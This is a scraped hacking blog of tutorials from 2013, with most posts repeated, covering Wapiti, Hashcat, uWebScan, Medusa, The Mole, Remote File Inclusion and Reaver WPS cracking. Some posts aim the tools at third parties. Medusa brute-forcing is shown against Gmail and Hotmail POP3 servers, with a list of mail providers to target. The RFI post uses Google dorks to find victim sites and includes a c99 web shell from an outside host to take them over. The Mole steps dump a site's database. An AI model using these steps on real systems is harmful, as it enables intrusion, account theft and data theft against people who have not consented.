Wapiti is a tool written in python that analyze website.
You can download wapiti from here
Work with python > 2.4 and python < 3.0
Wapiti can detect following vulnerabilies:
-File Handling Errors (Local and remote include/require, fopen, readfile...)
-Database Injection (PHP/JSP/ASP SQL Injections and XPath Injections)
-XSS (Cross Site Scripting) Injection
-LDAP Injection
-Command Execution detection (eval(), system(), passtru()...)
-CRLF Injection (HTTP Response Splitting, session fixation...)
For run wapiti type : ./wapiti.py url
The more important options are:
-s : To specify an url to start with
-x : To exclude an url from the scan
-p : To specify a proxy
-t : To fix the timeout
-v : Set the verbosity level 0: quiet (default), 1: print each url, 2: print every attack
-o : Set the name of the report file
Example :
./wapiti.py http://site.com -o /home/HackForLulz/result
Target = site.com
Output = /home/HackForLulz/result
./wapiti.py http://site.com -p 127.0.0.1:9050 -o /home/HackForLulz/result
Target = site.com
Output = /home/HackForLulz/result
Proxy : localhost:9050 (SOCKS 5) <- through by Tor
./wapiti.py http://site.com -x http://site.com/admin -n 100
Target = site.com
Exclude = http://site.com/admin <- Exclude directory /admin
Max url = 100
If you have a problem or you need some explanations just write under this post!
Wednesday, January 30, 2013
Sunday, January 27, 2013
WPS crack
So, what is WPS?
WPS (Wi-fi protected setup) is a computing standard that attempts to allow easy establishment of a secure wireless home network.
Why is vulnerable?
WPS has been shown to easily fall to brute-force attacks (discovered by Stefan Viehbock).
WPS ask you a 8 pin number (the last digit is checksum), so we've 10^8 combinatios, but WPS say you when the first (or the last) 4/3 pin is correct so we've 10^4+10^3 (11000) combinations.
How can we exploit this vulnerability?
There are two script (written by Stefan Viehbock):
-Reaver
-Wspcrack
If you have a problem or you need some explanations just write under this post!
WPS (Wi-fi protected setup) is a computing standard that attempts to allow easy establishment of a secure wireless home network.
Why is vulnerable?
WPS has been shown to easily fall to brute-force attacks (discovered by Stefan Viehbock).
WPS ask you a 8 pin number (the last digit is checksum), so we've 10^8 combinatios, but WPS say you when the first (or the last) 4/3 pin is correct so we've 10^4+10^3 (11000) combinations.
How can we exploit this vulnerability?
There are two script (written by Stefan Viehbock):
-Reaver
-Wspcrack
If you have a problem or you need some explanations just write under this post!
Tuesday, January 22, 2013
Hashcat - Advanced password recovery
Hashcat is an advanced tool for password recovery.
You can download hashcat from here
Hashcat support 6 attack-modes:
-0=Straight
-1=Combination
-2=Toggle-case
-3=Brute-force
-4=Permutation
-5=Table-lookup
Hashcat support a lot of algorithms like MD5, SHA1, MySQL, Phpass, MD4, SHA256, SHA512, OS X, vBullettin.
Hashcat work on all linux distro, windows and mac os x
Syntax : hashcat [options] hashfile [mask|wordfiles|directories]
-m : Hash-type, see references below
-a : Attack-mode
-o : Output file
-n : Number of threads
--pw-min=NUM Password-length minimum
--pw-max=NUM Password-length maximum
--custom-charset1=CS User-defined charsets
Charset :
-?l = abcdefghijklmnopqrstuvwxyz
-?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
-?d = 0123456789
-?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
-?a = ?l?u?d?s
-?h = 8 bit characters from 0xc0 - 0xff
-?D = 8 bit characters from german alphabet
-?F = 8 bit characters from french alphabet
-?R = 8 bit characters from russian alphabet
For more info type : hashcat -h
Hash type :
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
800 = SHA-1(Django)
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2600 = Double MD5
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3810 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = sha1(sha1($pass))
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap)
5000 = SHA-3(Keccak)
Example :
hashcat -m 0 -a 3 -n 5 --pw-min=3 --pw-max=5 --custom-charset1=?l hash.txt ?1?1?1?1?1 -o /home/HackForLulz/result
Type = MD5 (0=MD5)
Attack mode = Bruteforce
Threads = 5
Min lenght of password = 3
Max lenght of password = 5
Charset = ?l -> abcdefghijklmnopqrstuvwxyz
Hash = /home/HackForLulz/hash.txt
?1?1?1?1?1 = after ? you specify the "type" of char, for example if the first character is b you can specify ?l (because b is in ?l charset), if you don't know you use 1
Output = /home/HackForLulz/result <- File
hashcat -m 1400 -a 3 -n 5 --pw-min=4 --pw-max=7 --custom-charset1=?l?u?d?s hash.txt ?l?1?1?1?1?1?1 -o /home/HackForLulz/hash
Type = SHA256 (1400=SHA256)
Threads = 5
Min lenght of password = 4
Max lenght of password = 7
Charset = ?l?u?d?s -> abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
Hash = hash.txt <- File
?l?1?1?1?1?1?d -> first character is in ?l (abcde...) and the last character is in ?d (0123...)
If you have any problem or if you need some explanations just write under this post!
You can download hashcat from here
Hashcat support 6 attack-modes:
-0=Straight
-1=Combination
-2=Toggle-case
-3=Brute-force
-4=Permutation
-5=Table-lookup
Hashcat support a lot of algorithms like MD5, SHA1, MySQL, Phpass, MD4, SHA256, SHA512, OS X, vBullettin.
Hashcat work on all linux distro, windows and mac os x
Syntax : hashcat [options] hashfile [mask|wordfiles|directories]
-m : Hash-type, see references below
-a : Attack-mode
-o : Output file
-n : Number of threads
--pw-min=NUM Password-length minimum
--pw-max=NUM Password-length maximum
--custom-charset1=CS User-defined charsets
Charset :
-?l = abcdefghijklmnopqrstuvwxyz
-?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
-?d = 0123456789
-?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
-?a = ?l?u?d?s
-?h = 8 bit characters from 0xc0 - 0xff
-?D = 8 bit characters from german alphabet
-?F = 8 bit characters from french alphabet
-?R = 8 bit characters from russian alphabet
For more info type : hashcat -h
Hash type :
0 = MD5
10 = md5($pass.$salt)
20 = md5($salt.$pass)
50 = HMAC-MD5 (key = $pass)
60 = HMAC-MD5 (key = $salt)
100 = SHA1
110 = sha1($pass.$salt)
120 = sha1($salt.$pass)
150 = HMAC-SHA1 (key = $pass)
160 = HMAC-SHA1 (key = $salt)
200 = MySQL
300 = MySQL4.1/MySQL5
400 = phpass, MD5(Wordpress), MD5(phpBB3)
500 = md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5
800 = SHA-1(Django)
900 = MD4
1000 = NTLM
1100 = Domain Cached Credentials, mscash
1400 = SHA256
1410 = sha256($pass.$salt)
1420 = sha256($salt.$pass)
1450 = HMAC-SHA256 (key = $pass)
1460 = HMAC-SHA256 (key = $salt)
1600 = md5apr1, MD5(APR), Apache MD5
1700 = SHA512
1710 = sha512($pass.$salt)
1720 = sha512($salt.$pass)
1750 = HMAC-SHA512 (key = $pass)
1760 = HMAC-SHA512 (key = $salt)
1800 = SHA-512(Unix)
2600 = Double MD5
3300 = MD5(Sun)
3500 = md5(md5(md5($pass)))
3610 = md5(md5($salt).$pass)
3710 = md5($salt.md5($pass))
3810 = md5($salt.$pass.$salt)
3910 = md5(md5($pass).md5($salt))
4010 = md5($salt.md5($salt.$pass))
4110 = md5($salt.md5($pass.$salt))
4210 = md5($username.0.$pass)
4300 = md5(strtoupper(md5($pass)))
4400 = md5(sha1($pass))
4500 = sha1(sha1($pass))
4600 = sha1(sha1(sha1($pass)))
4700 = sha1(md5($pass))
4800 = MD5(Chap)
5000 = SHA-3(Keccak)
Example :
hashcat -m 0 -a 3 -n 5 --pw-min=3 --pw-max=5 --custom-charset1=?l hash.txt ?1?1?1?1?1 -o /home/HackForLulz/result
Type = MD5 (0=MD5)
Attack mode = Bruteforce
Threads = 5
Min lenght of password = 3
Max lenght of password = 5
Charset = ?l -> abcdefghijklmnopqrstuvwxyz
Hash = /home/HackForLulz/hash.txt
?1?1?1?1?1 = after ? you specify the "type" of char, for example if the first character is b you can specify ?l (because b is in ?l charset), if you don't know you use 1
Output = /home/HackForLulz/result <- File
hashcat -m 1400 -a 3 -n 5 --pw-min=4 --pw-max=7 --custom-charset1=?l?u?d?s hash.txt ?l?1?1?1?1?1?1 -o /home/HackForLulz/hash
Type = SHA256 (1400=SHA256)
Threads = 5
Min lenght of password = 4
Max lenght of password = 7
Charset = ?l?u?d?s -> abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
Hash = hash.txt <- File
?l?1?1?1?1?1?d -> first character is in ?l (abcde...) and the last character is in ?d (0123...)
If you have any problem or if you need some explanations just write under this post!
Monday, January 21, 2013
uWebScan - Web application vulneraility scanner
uWebScan is a small modular web scanner written in python.
This is not meant as a replacement to Nikto or similar scanners.
List of modules : (S=SAFE N=NOT SAFE)
-[S] apacheversion: Apache HTTPD Version Detection
-[S] bigipcookie : F5 BIGIP Cookie IP Exposure
-[S] httpheaders : HTTP Headers Available
-[S] httpoptions : HTTP OPTIONS Available
-[S] httptracevuln: HTTP TRACE Vulnerability
-[S] intipvuln : Internal IP Vulnerability
-[S] ntlmvuln : NTLM Authentication Vulnerability
-[S] propfindvuln : PROPFIND (WebDAV) Vulnerability
-[S] robotstxtvuln: Robots.txt "Disallow" Disclosure
-[N] webr00t : File & Directory Enumeration
-[S] webtime : Web Server Clock Check
You can download uWebScan from here
uWebScan need python < python3.0
syntax : ./uWebScan.py -h host -m module
m default = all module
-o : output file
-p : port
-s : use ssl
-l : list of modules
-n : disable safe mode (default : enable safe mode)
Example :
./uWebScan.py -h www.site.com -m -s -o /home/HackForLulz/result
Host = site.com
Module = All (except NOT SAFE modules)
ssl = Enabled
Output file = /home/HackForLulz/result
./uWebScan.py -h www.site.com -m apacheversion bigipcookie httpheaders -s
Host = site.com
Module = apacheversione, bigipcookie, httpheaders
ssl = Enabled
./uWebScan.py -h www.site.com -m -n
Host = site.com
Module = All (SAFE AND NOT SAFE)
ssl = Disabled
For more informations type : ./uWebScan -h
If you have any problem or if you need some explanations just write under this post!
This is not meant as a replacement to Nikto or similar scanners.
List of modules : (S=SAFE N=NOT SAFE)
-[S] apacheversion: Apache HTTPD Version Detection
-[S] bigipcookie : F5 BIGIP Cookie IP Exposure
-[S] httpheaders : HTTP Headers Available
-[S] httpoptions : HTTP OPTIONS Available
-[S] httptracevuln: HTTP TRACE Vulnerability
-[S] intipvuln : Internal IP Vulnerability
-[S] ntlmvuln : NTLM Authentication Vulnerability
-[S] propfindvuln : PROPFIND (WebDAV) Vulnerability
-[S] robotstxtvuln: Robots.txt "Disallow" Disclosure
-[N] webr00t : File & Directory Enumeration
-[S] webtime : Web Server Clock Check
You can download uWebScan from here
uWebScan need python < python3.0
syntax : ./uWebScan.py -h host -m module
m default = all module
-o : output file
-p : port
-s : use ssl
-l : list of modules
-n : disable safe mode (default : enable safe mode)
Example :
./uWebScan.py -h www.site.com -m -s -o /home/HackForLulz/result
Host = site.com
Module = All (except NOT SAFE modules)
ssl = Enabled
Output file = /home/HackForLulz/result
./uWebScan.py -h www.site.com -m apacheversion bigipcookie httpheaders -s
Host = site.com
Module = apacheversione, bigipcookie, httpheaders
ssl = Enabled
./uWebScan.py -h www.site.com -m -n
Host = site.com
Module = All (SAFE AND NOT SAFE)
ssl = Disabled
For more informations type : ./uWebScan -h
If you have any problem or if you need some explanations just write under this post!
Saturday, January 19, 2013
Medusa - bruteforce
Medusa is an open source software for bruteforce.
Medusa support a lot of modules:
-AFP
-CVS
-FTP
-HTTP
-IMAP
-MS-SQL
-MySQL
-NCP (NetWare)
-NNTP
-PcAnywhere
-POP3
-PostgreSQL
-rexec
-rlogin
-rsh
-SMB
-SMTP (AUTH/VRFY)
-SNMP
-SSHv2
-SVN
-Telnet
-VmAuthd
-VNC
-Web-form
-Wrapper
sudo apt-get install linux-headers-$(uname -r) build-essential make patch subversion libssl-dev libncp libncp-dev libpq5 libpq-dev libssh2-1 libssh2-1-dev libgcrypt11-dev libgnutls-dev libsvn-dev
sudo apt-get install medusa
Archlinux : Download tarball from here
tar -zxvf medusa.tar.gz
cd medusa
makepkg -csi
Syntax: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] -M module [OPT]
-h : Target hostname or IP address
-H : File with target hostnames or IP addresses
-u : username to test
-U : File with usernames to test
-p : Password to test
-P : File with passwords to test
-M : Name of the module to execute
Most important [OPT]:
-O : File to append log information to
-d : Dump all known modules
-n : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
Example :
medusa -h pop.gmail.com -u hackforlulz@gmail.com -P /home/HackForLulz/wordlist -s -M POP3
Host = pop.gmail.com
Username = hackforlulz@gmail.com
Passwords = File /home/HackForLulz/wordlist
ssl = enabled
Module = POP3
medusa -h pop3.live.com -U /home/HackForLulz/user -P /home/HackForLulz/wordlist -n 995 -M POP3
Host = pop3.live.com
Username = /home/HackForLulz/user <- file
Passwords = File /home/HackForLulz/wordlist
Port = 995
Module = POP3
Most popular server of email are :
GMAIL - pop.gmail.com - smtp.gmail.com (ssl)
LIBERO ADSL - popmail.libero.it – imapmail.iol.it - mail.libero.it
MSN HOTMAIL - pop3.live.com (port 995) smtp.live.com (port 25)
ALICE ADSL - in.alice.it out.alice.it
TIM.IT - mail.posta.tim.it – box.posta.tim.it box.posta.tim.it
ROSSOALICE - in.aliceposta.it – box.tin.it out.aliceposta.it – mail.tin.it
TIN.IT - pop.tin.it – box.tin.it (aliceadsl) – box.clubnet.tin.it – box2.tin.it
VIRGILIO - in.virgilio.it – popmail.virgilio.it out.virgilio.it – smtp.virgilio.it
TISCALI.IT - pop.tiscali.it smtp.tiscali.
ALICEPOSTA.IT - in.alice.it
KATAWEB.IT - mail.katamail.com – pop.katamail.com smtp.katamail.com
LYCOS - pop.lycos.it – pop3.lycos.it smtp.lycos.it
MSN.COM - smtp.email.msn.com pop3.email.msn.com
SUPEREVA.IT - mail.supereva.it mail.supereva.it
VODAFONE MAIL - popmail.vodafone.it - smtp.net.vodafone.it
YAHOO.COM - pop.mail.yahoo.com smtp.mail.yahoo.com
ARUBA.IT - pop3.aruba.it smtp.aruba.it
For more information type in terminal : medusa
If you have any problem or if you need some explanations just write under this post!
Medusa support a lot of modules:
-AFP
-CVS
-FTP
-HTTP
-IMAP
-MS-SQL
-MySQL
-NCP (NetWare)
-NNTP
-PcAnywhere
-POP3
-PostgreSQL
-rexec
-rlogin
-rsh
-SMB
-SMTP (AUTH/VRFY)
-SNMP
-SSHv2
-SVN
-Telnet
-VmAuthd
-VNC
-Web-form
-Wrapper
Install
Ubuntu :sudo apt-get install linux-headers-$(uname -r) build-essential make patch subversion libssl-dev libncp libncp-dev libpq5 libpq-dev libssh2-1 libssh2-1-dev libgcrypt11-dev libgnutls-dev libsvn-dev
sudo apt-get install medusa
Archlinux : Download tarball from here
tar -zxvf medusa.tar.gz
cd medusa
makepkg -csi
Start
Syntax: medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] -M module [OPT]
-h : Target hostname or IP address
-H : File with target hostnames or IP addresses
-u : username to test
-U : File with usernames to test
-p : Password to test
-P : File with passwords to test
-M : Name of the module to execute
Most important [OPT]:
-O : File to append log information to
-d : Dump all known modules
-n : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process the entire username before proceeding.
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
Example :
medusa -h pop.gmail.com -u hackforlulz@gmail.com -P /home/HackForLulz/wordlist -s -M POP3
Host = pop.gmail.com
Username = hackforlulz@gmail.com
Passwords = File /home/HackForLulz/wordlist
ssl = enabled
Module = POP3
medusa -h pop3.live.com -U /home/HackForLulz/user -P /home/HackForLulz/wordlist -n 995 -M POP3
Host = pop3.live.com
Username = /home/HackForLulz/user <- file
Passwords = File /home/HackForLulz/wordlist
Port = 995
Module = POP3
Most popular server of email are :
GMAIL - pop.gmail.com - smtp.gmail.com (ssl)
LIBERO ADSL - popmail.libero.it – imapmail.iol.it - mail.libero.it
MSN HOTMAIL - pop3.live.com (port 995) smtp.live.com (port 25)
ALICE ADSL - in.alice.it out.alice.it
TIM.IT - mail.posta.tim.it – box.posta.tim.it box.posta.tim.it
ROSSOALICE - in.aliceposta.it – box.tin.it out.aliceposta.it – mail.tin.it
TIN.IT - pop.tin.it – box.tin.it (aliceadsl) – box.clubnet.tin.it – box2.tin.it
VIRGILIO - in.virgilio.it – popmail.virgilio.it out.virgilio.it – smtp.virgilio.it
TISCALI.IT - pop.tiscali.it smtp.tiscali.
ALICEPOSTA.IT - in.alice.it
KATAWEB.IT - mail.katamail.com – pop.katamail.com smtp.katamail.com
LYCOS - pop.lycos.it – pop3.lycos.it smtp.lycos.it
MSN.COM - smtp.email.msn.com pop3.email.msn.com
SUPEREVA.IT - mail.supereva.it mail.supereva.it
VODAFONE MAIL - popmail.vodafone.it - smtp.net.vodafone.it
YAHOO.COM - pop.mail.yahoo.com smtp.mail.yahoo.com
ARUBA.IT - pop3.aruba.it smtp.aruba.it
For more information type in terminal : medusa
If you have any problem or if you need some explanations just write under this post!
Thursday, January 17, 2013
Themole - Sqlinjection
The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.
Features
-Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
-Command line interface. Different commands trigger different actions.
-Auto-completion for commands, command arguments and database, table and columns names.
-Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
-Exploits SQL Injections through GET/POST/Cookie parameters.
-Developed in python 3.
-Exploits SQL Injections that return binary data.
-Powerful command interpreter to simplify its usage.
First of all download themole from official website here
Now we need python 3 and lxml library.
Now for run move into directory themole (cd..) and type : ./mole.py
Now type:
1) url www.website.com/index.php?pag=1
2) needle pag (pag is the parameter vulnerable in url)
3) schemas
4) tables dbname
5) columns dbname tablename
6) query dbname tablename column1,column2,column3...
For more information click here
If you have a problem or you need some explanations just write under this post!
Features
-Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
-Command line interface. Different commands trigger different actions.
-Auto-completion for commands, command arguments and database, table and columns names.
-Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
-Exploits SQL Injections through GET/POST/Cookie parameters.
-Developed in python 3.
-Exploits SQL Injections that return binary data.
-Powerful command interpreter to simplify its usage.
First of all download themole from official website here
Now we need python 3 and lxml library.
Now for run move into directory themole (cd..) and type : ./mole.py
Now type:
1) url www.website.com/index.php?pag=1
2) needle pag (pag is the parameter vulnerable in url)
3) schemas
4) tables dbname
5) columns dbname tablename
6) query dbname tablename column1,column2,column3...
For more information click here
If you have a problem or you need some explanations just write under this post!
Saturday, January 12, 2013
Remote File Inclusion
RFI (Remote File Inclusion) is a type of vulnerability on websites.
It allows an attacker to include a remote file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
RFI is a old vulnerability, so vulnerable sites are very few.
So, how find a vulnerable site ?
We can use Google Dork, for more info about google dork click here
What kind of dork we can use ?
I reccomend dork like :
inurl:index.php?page=
inurl:index.php?login=
And so on..
Now we need a shell (c100, c99, r57) that is uploaded on a server, for example http://c99.gen.tr/c99.txt
Now we have a vulnerable site and shell.
www.site.com/index.php?page= (vulnerable site)
www.site.com/index.php?page=www.c99.gen.tr/c99.txt
If we can see c99 we've root access on site.
If you have a problem or you need some explanations just write under this post!
It allows an attacker to include a remote file, usually through a script on the web server.
The vulnerability occurs due to the use of user-supplied input without proper validation.
RFI is a old vulnerability, so vulnerable sites are very few.
So, how find a vulnerable site ?
We can use Google Dork, for more info about google dork click here
What kind of dork we can use ?
I reccomend dork like :
inurl:index.php?page=
inurl:index.php?login=
And so on..
Now we need a shell (c100, c99, r57) that is uploaded on a server, for example http://c99.gen.tr/c99.txt
Now we have a vulnerable site and shell.
www.site.com/index.php?page= (vulnerable site)
www.site.com/index.php?page=www.c99.gen.tr/c99.txt
If we can see c99 we've root access on site.
If you have a problem or you need some explanations just write under this post!
Friday, January 4, 2013
Reaver - Crack Wifi
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
You can download reaver from here
For crack a wifi we type:
reaver -i monitor mode enable on -b bssid -vv
For more info about monitor mode and how to find bssid click here
For more information about reaver type :
reaver -h
If you have a problem or you need some explanations just write under this post!
Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
You can download reaver from here
For crack a wifi we type:
reaver -i monitor mode enable on -b bssid -vv
For more info about monitor mode and how to find bssid click here
For more information about reaver type :
reaver -h
If you have a problem or you need some explanations just write under this post!
Subscribe to:
Posts (Atom)